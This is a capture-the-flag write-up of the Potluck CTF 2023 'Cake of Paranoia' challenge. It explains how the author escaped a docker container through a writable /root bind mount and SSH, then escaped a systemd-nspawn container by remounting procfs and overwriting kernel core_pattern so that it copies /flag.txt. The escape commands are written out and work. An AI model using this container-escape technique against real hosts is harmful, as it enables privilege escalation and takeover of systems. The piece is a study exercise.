~ all posts ctf projects
687 words
3 minutes
Potluck CTF 2023 -- Cake of Paranoia
2023-12-28
1
A layer cake of paranoia. Please enjoy, and don't be afraid to take seconds.

I blooded the chal :) with a cheese strat way easier than intended challenge01-dist.tgz

We’re provided a rootfs and tcp connection info which gets us a shell.

1
potluck-ctf-2023/cake-of-paranoia/rootfs
2
❯ fd
3
4
etc/systemd/nspawn/
5
etc/systemd/nspawn/ubuntu.nspawn
6
etc/systemd/system.control/systemd-nspawn@ubuntu.service.d/
7
etc/systemd/system.control/systemd-nspawn@ubuntu.service.d/50-DeviceAllow.conf
8
...
9
etc/systemd/system/multi-user.target.wants/machines.target
10
etc/systemd/system/machines.target.wants/
11
etc/systemd/system/machines.target.wants/systemd-nspawn@ubuntu.service
12
...
13
var/lib/machines/ubuntu/
14
usr/lib/libnss_mymachines.so.2
15
usr/share/man/man1/systemd-machine-id-setup.1.gz
16
var/lib/machines/ubuntu/opt/
17
var/lib/machines/ubuntu/opt/containerd/
18
var/lib/machines/ubuntu/opt/containerd/bin/
19
var/lib/machines/ubuntu/opt/containerd/lib/
20
var/lib/machines/ubuntu/bin
21
var/lib/machines/ubuntu/sys/
22
var/lib/machines/ubuntu/media/
23
var/lib/machines/ubuntu/lib
24
var/lib/machines/ubuntu/run/
25
var/lib/machines/ubuntu/boot/
26
...
27
var/lib/machines/ubuntu/var/lib/docker/
28
var/lib/machines/ubuntu/var/lib/docker/engine-id
29
var/lib/machines/ubuntu/var/lib/docker/runtimes/
15 collapsed lines
30
var/lib/machines/ubuntu/var/lib/docker/network/
31
var/lib/machines/ubuntu/var/lib/docker/network/files/
32
var/lib/machines/ubuntu/var/lib/docker/network/files/local-kv.db
33
var/lib/machines/ubuntu/var/lib/docker/volumes/
34
var/lib/machines/ubuntu/var/lib/docker/volumes/metadata.db
35
var/lib/machines/ubuntu/var/lib/docker/volumes/backingFsBlockDev
36
var/lib/machines/ubuntu/var/lib/docker/containers/
37
var/lib/machines/ubuntu/var/lib/docker/containers/68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221/
38
var/lib/machines/ubuntu/var/lib/docker/containers/68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221/68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221-json.log
39
var/lib/machines/ubuntu/var/lib/docker/containers/68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221/mounts/
40
var/lib/machines/ubuntu/var/lib/docker/containers/68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221/hosts
41
var/lib/machines/ubuntu/var/lib/docker/containers/68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221/hostconfig.json
42
var/lib/machines/ubuntu/var/lib/docker/containers/68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221/resolv.conf.hash
43
var/lib/machines/ubuntu/var/lib/docker/containers/68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221/resolv.conf
44
var/lib/machines/ubuntu/var/lib/docker/containers/68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221/config.v2.json

Examining the rootfs and connecting to the shell the general structure of the challenge becomes clear.

We connect into a shell inside a docker container. This docker container is running inside a systemd nspawn container. This nspawn container is running inside an arch vm and the flag is present in /flag.txt inside the top level vm.

1
// runs every minute by cron
2
const GLib = imports.gi.GLib;
3
4
if (!GLib.access("/flag.txt", 0)) {
5
console.log("yay, the flag's still there!");
6
} else {
7
console.log("whoops, the flag's gone");
8
}

We’ll need to do two container escapes — first from docker to nspawn and then from nspawn to the top level. I’ll first examine the docker container for any security-relevant configuration.

1
> cat /proc/self/status | grep CapEff
2
CapEff: 00000000a80425fb
3
> capsh --decode=00000000a80425fb
4
0x00000000a80425fb=cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_mknod,cap_audit_write,cap_setfcap

Capabilities are more or less uninteresting — default and nothing that can be leverage to break out. Looking inside the container config though shows something very suspicious — that /root is mounted as a volume inside the container.

1
{
2
"StreamConfig": {},
3
"State": {
4
"Running": true,
5
"Paused": false,
6
"Restarting": false,
7
"OOMKilled": false,
8
"RemovalInProgress": false,
9
"Dead": false,
10
"Pid": 466,
11
"ExitCode": 0,
12
"Error": "",
13
"StartedAt": "2023-11-29T08:37:47.639966172Z",
14
"FinishedAt": "0001-01-01T00:00:00Z",
15
"Health": null
16
},
17
"ID": "68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221",
18
"Created": "2023-11-29T08:37:46.082139124Z",
19
"Managed": false,
20
"Path": "socat",
21
"Args": [
22
"-d",
23
"-d",
24
"TCP-LISTEN:1337,reuseaddr,fork",
25
"EXEC:/bin/sh,stderr"
26
],
27
"Config": {
28
"Hostname": "68be6028e3e4",
29
"Domainname": "",
111 collapsed lines
30
"User": "",
31
"AttachStdin": false,
32
"AttachStdout": false,
33
"AttachStderr": false,
34
"ExposedPorts": {
35
"1337/tcp": {}
36
},
37
"Tty": false,
38
"OpenStdin": false,
39
"StdinOnce": false,
40
"Env": [
41
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
42
],
43
"Cmd": null,
44
"Image": "entrypoint",
45
"Volumes": null,
46
"WorkingDir": "",
47
"Entrypoint": [
48
"socat",
49
"-d",
50
"-d",
51
"TCP-LISTEN:1337,reuseaddr,fork",
52
"EXEC:/bin/sh,stderr"
53
],
54
"OnBuild": null,
55
"Labels": {}
56
},
57
"Image": "sha256:8adf4a1c6bc350ad16f843424110069b69e4423ef4d87daa39c38ab001659166",
58
"ImageManifest": null,
59
"NetworkSettings": {
60
"Bridge": "",
61
"SandboxID": "e1a8b0eceb93d2ed34f0e5f0c5935963554cf35071a19b7dbb692c1e25540c7e",
62
"HairpinMode": false,
63
"LinkLocalIPv6Address": "",
64
"LinkLocalIPv6PrefixLen": 0,
65
"Networks": {
66
"bridge": {
67
"IPAMConfig": null,
68
"Links": null,
69
"Aliases": null,
70
"NetworkID": "8a082b6e4f0e46624e5ca1cc014fc1a5a52f44d6b4ce65cc6a015b7391de87de",
71
"EndpointID": "07628d86f5bf567d848707f7f1af75d72bf89059d19349ab71f21b6d0fdf25bc",
72
"Gateway": "172.17.0.1",
73
"IPAddress": "172.17.0.2",
74
"IPPrefixLen": 16,
75
"IPv6Gateway": "",
76
"GlobalIPv6Address": "",
77
"GlobalIPv6PrefixLen": 0,
78
"MacAddress": "02:42:ac:11:00:02",
79
"DriverOpts": null,
80
"IPAMOperational": false
81
}
82
},
83
"Service": null,
84
"Ports": {
85
"1337/tcp": [
86
{
87
"HostIp": "0.0.0.0",
88
"HostPort": "1337"
89
},
90
{
91
"HostIp": "::",
92
"HostPort": "1337"
93
}
94
]
95
},
96
"SandboxKey": "/var/run/docker/netns/e1a8b0eceb93",
97
"SecondaryIPAddresses": null,
98
"SecondaryIPv6Addresses": null,
99
"IsAnonymousEndpoint": true,
100
"HasSwarmEndpoint": false
101
},
102
"LogPath": "/var/lib/docker/containers/68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221/68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221-json.log",
103
"Name": "/jovial_mcnulty",
104
"Driver": "overlay2",
105
"OS": "linux",
106
"RestartCount": 0,
107
"HasBeenStartedBefore": true,
108
"HasBeenManuallyStopped": false,
109
"MountPoints": {
110
"/root": {
111
"Source": "/root",
112
"Destination": "/root",
113
"RW": true,
114
"Name": "",
115
"Driver": "",
116
"Type": "bind",
117
"Propagation": "rprivate",
118
"Spec": {
119
"Type": "bind",
120
"Source": "/root",
121
"Target": "/root"
122
},
123
"SkipMountpointCreation": false
124
}
125
},
126
"SecretReferences": null,
127
"ConfigReferences": null,
128
"MountLabel": "",
129
"ProcessLabel": "",
130
"AppArmorProfile": "",
131
"SeccompProfile": "",
132
"NoNewPrivileges": false,
133
"HostnamePath": "/var/lib/docker/containers/68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221/hostname",
134
"HostsPath": "/var/lib/docker/containers/68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221/hosts",
135
"ShmPath": "",
136
"ResolvConfPath": "/var/lib/docker/containers/68be6028e3e4a7b4a2c5f65d6e9681881ae1abf08b664e0f83d64d5092f1e221/resolv.conf",
137
"LocalLogCacheMeta": {
138
"HaveNotifyEnabled": false
139
}
140
}

Following up on that shows that we have write access to root’s .ssh directory, sshd is running on the host, and the host and docker container are networked together. After fighting for a long time with the IO, I managed to get dropbear on inside the container and confirmed I could ssh up a level.

1
> cat /proc/self/status | grep CapEff
2
CapEff: 00000000fdecbfff
3
> capsh --decode=00000000fdecbfff
4
0x00000000fdecbfff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_owner,cap_sys_chroot,cap_sys_ptrace,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap

Looking at the config shows we are explicitly allowed to invoke add_key, keyctl, or bpf syscalls inside the container.

1
[Exec]
2
Boot=true
3
PrivateUsers=false
4
SystemCallFilter=add_key keyctl bpf
5
6
[Network]
7
Zone=guests
8
Port=1337
9
10
[Files]
11
Bind=/dev/fuse

I know the author well enough to know that the intended solution is bpf fuckery (with the bpf syscall and cap_sys_admin) but I don’t know bpf well and didn’t want to do that. Fortunately for me, cap_sys_admin is an unreasonably powerful capability and there are other routes.

Systemd, by default, mounts procfs and sys as read-only. It does not prevent a user with the appropriate (and default) capabilities from mounting procfs again r/w. Once you have write access to procfs it’s trivial to escalate privileges by modifying core_pattern.

1
> mkdir proc
2
> mount -t proc proc proc
3
> echo '|/usr/bin/cp /flag.txt /var/lib/machines/ubuntu/flag.txt' > proc/sys/kernel/core_pattern
4
./crash
5
> cat /flag.txt
6
potluck{sometimes-we-all-get-in-a-little-over-our-heads-dont-we}